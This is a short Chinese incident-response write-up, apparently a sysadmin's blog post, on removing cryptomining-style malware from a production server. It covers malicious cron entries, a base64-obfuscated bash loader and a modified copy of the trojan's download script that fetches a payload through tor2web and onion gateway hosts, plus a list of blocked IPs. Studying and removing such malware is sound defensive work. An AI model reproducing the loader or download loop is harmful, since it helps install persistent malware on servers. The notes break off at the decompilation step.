生产环境的CPU飚高,发现可疑进程
一执行就删除了
kill -9 强杀,crond -l 检查发现异常,先清理定时任务
0 * * * * ~/.systemd-login
查IP:http://www.cip.cc
~/.systemd-login内容分析
#!/bin/bash
exec &>/dev/null
sleep 7
{echo,ZXhlYyA................ZmkK}|{base64,-d}|bash
base64解密脚本中的echo字符串:http://tool.oschina.net/encrypt?type=3
封杀脚本下载站点:rapid7xxx.xxx
封杀IP:101.64.182.145
CPU过一段时间又飚高
又发现一个隐藏的定时任务
/etc/cron.d/systemd : 0 * * * * root /lib/systemd/systemd-login
再删掉
观察一段时间
CPU再次飚高,定时任务又被恢复。。。
手动下载定时任务脚本进行分析
解密
通过文件/tmp/.X1M-unix 找到守护进程gf128mul,负责检查木马存活、定时任务、木马文件下载
继续杀
修改脚本,手动执行下载木马
#!/bin/sh
x() {
x=/systemd-login
z=./Trojan_$(cat /dev/urandom | tr -cd [:alnum:]|head -c 6)
wget -t1 -T180 -U- --no-check-certificate $1$x -O$z || curl -m180 -fLkA- $1$x -o$z
## chmod +x $z;$z;rm -f $z
}
for h in tor2web.io d2web.org tor2web.su onion.to onion.mn onion.glass onion.in.net onion.sh
do
if ! ps -p $(</tmp/.X1M-unix); then
echo "downloading..."
x aptgetgxqs3secda.$h
echo $z
else
break
fi
done
封杀以下IP:
- 38.229.33.40
- 173.255.218.140
- 149.56.101.79
- 185.100.85.150
- 46.105.146.232
- 139.162.228.156
- 185.178.208.150
- 37.228.129.102
反编译木马分析代码:
下载守护进程gf128mul,反编译: